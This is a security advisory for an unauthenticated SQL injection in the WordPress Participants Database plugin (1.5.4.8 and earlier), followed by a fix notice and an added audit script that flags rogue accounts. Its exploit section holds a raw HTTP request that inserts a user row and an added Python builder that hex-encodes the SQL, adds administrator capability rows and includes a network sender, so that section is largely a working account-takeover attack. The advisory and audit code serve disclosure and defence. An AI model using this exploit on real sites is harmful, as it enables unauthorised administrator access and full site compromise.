
WordPress Participants Database 1.5.4.8 SQL Injection

Posted Jun 2, 2014
Authored by Yarubo Research Team

WordPress Participants Database plugin versions 1.5.4.8 and below allow an unauthenticated remote attacker to execute arbitrary SQL statements against the site's database.

tags | exploit, remote, arbitrary, sql injection
MD5 | d6e1afcc6cd5694fc6b843b581eab617

Yarubo #1: Arbitrary SQL Execution in Participants Database for WordPress
=========================================================================

Program: Participants Database <= 1.5.4.8
Severity: An unauthenticated attacker can fully compromise the WordPress
installation
Permalink: http://www.yarubo.com/advisories/1

— Info —

Participants Database is a popular WordPress plugin that offers the
functionality needed to build and maintain a database of people. At the
time of writing (June 2014) the plugin has been downloaded 92,089 times.

— Vulnerability details —

1. Due to insufficient privilege checks, anonymous (unauthenticated)
users can trigger some of the plugin's administrative actions on any
public page that renders one of its shortcodes (e.g. the signup page).

2. The CSV export action ("output CSV" in the request below) takes a
parameter called "query" whose value is run as-is against the database.
An unauthenticated user can therefore execute arbitrary SQL statements:
create an administrator account, or, depending on the privileges of the
MySQL account WordPress connects with, read or write files on the database
host and from there execute code.


— Exploit —

Add a user to WordPress with the request below, sent to a page that renders
one of the plugin's shortcodes (here the signup page). The inserted row is
an ordinary user; for an administrator, also insert the corresponding
capability rows into wp_usermeta.


POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN

------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="action"

output CSV
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="CSV_type"

participant list
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="subsource"

participants-database
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="query"

INSERT INTO wp_users
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
VALUES
(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);

------WebKitFormBoundaryuoACADe1C2IFWMxN--

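The request above, rebuilt as an added Python example (this is not code from the advisory or from the plugin): it hex-encodes string literals the way the advisory's payload does, assembles the multipart body with the same four field names, and builds the wp_usermeta statement that turns the new row into an administrator. Several things here are additions rather than facts from the advisory: the send() helper, the capability and user-level values (standard WordPress role storage), and the explanation that the payload avoids quoted strings because WordPress backslash-escapes quotes in $_POST via wp_magic_quotes(). The phpass hash is copied from the advisory's request; the password behind it is not stated anywhere on this page.

```python
import binascii
import http.client
import urllib.parse

# Boundary and phpass hash taken from the advisory's request. The advisory does
# not say which password the hash corresponds to, so it is carried as-is.
BOUNDARY = "----WebKitFormBoundaryuoACADe1C2IFWMxN"
PHPASS_HASH = "$P$BZzYaSTHoA6Ki3U65vw/TaG8aA/GZK1"


def hex_literal(value: str) -> str:
    """Encode a string as a MySQL hex string literal, e.g. 'test' -> 0x74657374.

    The advisory's payload uses these instead of quoted strings. Likely reason
    (assumption, not stated in the advisory): WordPress runs wp_magic_quotes()
    over $_POST, which backslash-escapes quote characters, while a bare 0x...
    literal contains nothing that addslashes() would touch.
    """
    return "0x" + binascii.hexlify(value.encode("utf-8")).decode("ascii")


def decode_hex_literal(literal: str) -> str:
    """Reverse of hex_literal; handy for reading payloads like the one above."""
    if not literal.startswith("0x"):
        raise ValueError("not a MySQL hex literal: %r" % literal)
    return binascii.unhexlify(literal[2:]).decode("utf-8")


def build_insert_user(user_id, login, nicename, phpass_hash, email,
                      registered, display_name, prefix="wp_"):
    """INSERT statement for a <prefix>users row, every string hex-encoded."""
    h = hex_literal
    return (
        f"INSERT INTO {prefix}users "
        "(ID,user_login,user_pass,user_nicename,user_email,user_registered,"
        "user_status,display_name) VALUES "
        f"({int(user_id)},{h(login)},{h(phpass_hash)},{h(nicename)},{h(email)},"
        f"{h(registered)},0,{h(display_name)});"
    )


def build_grant_admin(user_id, prefix="wp_"):
    """INSERT for the two usermeta rows WordPress uses to mark an administrator.

    Assumption: standard WordPress role storage, i.e. a serialized capability
    array under <prefix>capabilities and the legacy level 10 under
    <prefix>user_level. One statement, two VALUES tuples.
    """
    h = hex_literal
    caps = 'a:1:{s:13:"administrator";b:1;}'
    return (
        f"INSERT INTO {prefix}usermeta (user_id,meta_key,meta_value) VALUES "
        f"({int(user_id)},{h(prefix + 'capabilities')},{h(caps)}),"
        f"({int(user_id)},{h(prefix + 'user_level')},{h('10')});"
    )


def build_multipart(fields, boundary=BOUNDARY) -> bytes:
    """Encode (name, value) pairs as multipart/form-data with CRLF line
    endings, terminated by the closing --boundary-- delimiter."""
    lines = []
    for name, value in fields:
        lines += [f"--{boundary}",
                  f'Content-Disposition: form-data; name="{name}"',
                  "",
                  value]
    lines += [f"--{boundary}--", ""]
    return "\r\n".join(lines).encode("utf-8")


def build_request_body(query, boundary=BOUNDARY) -> bytes:
    """The four fields the advisory's request carries, with our SQL in 'query'."""
    fields = [("action", "output CSV"),
              ("CSV_type", "participant list"),
              ("subsource", "participants-database"),
              ("query", query)]
    return build_multipart(fields, boundary)


def send(url, body, boundary=BOUNDARY, timeout=10):
    """POST the body to a page that renders one of the plugin's shortcodes.

    Network helper for systems you are authorised to test; nothing in this
    file calls it. Returns (status, response bytes).
    """
    u = urllib.parse.urlsplit(url)
    conn_cls = (http.client.HTTPSConnection if u.scheme == "https"
                else http.client.HTTPConnection)
    conn = conn_cls(u.netloc, timeout=timeout)
    conn.request("POST", u.path or "/", body=body, headers={
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    })
    resp = conn.getresponse()
    return resp.status, resp.read()


if __name__ == "__main__":
    stmt = build_insert_user(31337, "test", "Yarubo", PHPASS_HASH,
                             "test@test.com", "2014-11-11 00:00:00", "Yarubo")
    print(stmt)                       # reproduces the advisory's query
    print(build_grant_admin(31337))   # the wp_usermeta follow-up
    print(build_request_body(stmt).decode())
```

Send the wp_users INSERT and the wp_usermeta INSERT as two separate requests: the advisory itself treats the usermeta rows as a separate step, and whether the plugin's query path would accept stacked statements is not established on this page. The hard-coded "wp_" prefix is the WordPress default; a site with a custom table prefix needs prefix= set accordingly.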


— Solution —

This issue has been fixed in version 1.5.4.9. Download the newest version
from:

https://wordpress.org/plugins/participants-database/

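Updating closes the hole but does not remove accounts the injection may already have planted. The following added Python check (not from the advisory or the plugin) runs over constructed wp_users and wp_usermeta rows and flags the tell-tales of a row inserted with raw SQL rather than through wp_insert_user(): a registration timestamp in the future (the advisory's payload writes 2014-11-11, months after the advisory's own date), a large jump in ID (31337), and missing usermeta keys that WordPress normally writes when it creates an account. The sample rows, the set of expected meta keys and the ID-gap threshold are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample rows (not from any real site), in the shape of
#   SELECT ID, user_login, user_registered FROM wp_users;
#   SELECT user_id, meta_key, meta_value FROM wp_usermeta;
# The third user mirrors the advisory's payload: ID 31337, login "test",
# user_registered 2014-11-11, and only the two meta rows an attacker would add.
USERS = [
    {"ID": 1, "user_login": "admin", "user_registered": "2013-02-10 09:14:00"},
    {"ID": 2, "user_login": "editor", "user_registered": "2013-05-21 16:02:33"},
    {"ID": 31337, "user_login": "test", "user_registered": "2014-11-11 00:00:00"},
]
USERMETA = [
    (1, "nickname", "admin"),
    (1, "rich_editing", "true"),
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (1, "wp_user_level", "10"),
    (2, "nickname", "editor"),
    (2, "rich_editing", "true"),
    (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (2, "wp_user_level", "7"),
    (31337, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (31337, "wp_user_level", "10"),
]

# Assumption: meta keys wp_insert_user() writes for every account it creates.
# A row inserted with raw SQL lacks them unless the attacker added them too.
EXPECTED_META = frozenset({"nickname", "rich_editing"})

TS_FORMAT = "%Y-%m-%d %H:%M:%S"


def audit_users(users, usermeta, as_of, id_gap=1000, prefix="wp_"):
    """Return {user_login: [reasons]} for accounts that look SQL-inserted.

    as_of: "YYYY-MM-DD HH:MM:SS" to compare user_registered against (the time
    of the audit, or the date of the incident being reconstructed).
    id_gap: flag an ID that exceeds its predecessor by more than this
    (assumed threshold; AUTO_INCREMENT normally advances by 1).
    """
    now = datetime.strptime(as_of, TS_FORMAT)
    meta = defaultdict(dict)
    for user_id, key, value in usermeta:
        meta[user_id][key] = value

    ids = sorted(u["ID"] for u in users)
    findings = {}
    for u in users:
        reasons = []
        m = meta.get(u["ID"], {})

        missing = EXPECTED_META - set(m)
        if missing:
            reasons.append("missing usermeta normally written on creation: "
                           + ", ".join(sorted(missing)))

        registered = datetime.strptime(u["user_registered"], TS_FORMAT)
        if registered > now:
            reasons.append(f"user_registered {u['user_registered']} is in the future")

        pos = ids.index(u["ID"])
        if pos > 0 and u["ID"] - ids[pos - 1] > id_gap:
            reasons.append(f"ID jumps by {u['ID'] - ids[pos - 1]} from the previous account")

        # Being an administrator is only interesting alongside another anomaly.
        if reasons and "administrator" in m.get(prefix + "capabilities", ""):
            reasons.append("account holds the administrator role")

        if reasons:
            findings[u["user_login"]] = reasons
    return findings


if __name__ == "__main__":
    for login, reasons in audit_users(USERS, USERMETA, "2014-06-02 00:00:00").items():
        print(login)
        for reason in reasons:
            print("  -", reason)
```

Run the same three queries against a real dump and feed the rows in; on a site with a custom table prefix pass prefix= so the capability key is matched correctly. Any account flagged with two or more reasons should have its password hash and sessions invalidated, not just its role removed.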

— Credit —


Yarubo Research Team
research [at] yarubo.com

Network Security Scan:
http://www.yarubo.com/

Free Heartbleed Scan:
http://www.yarubo.com/heartbleed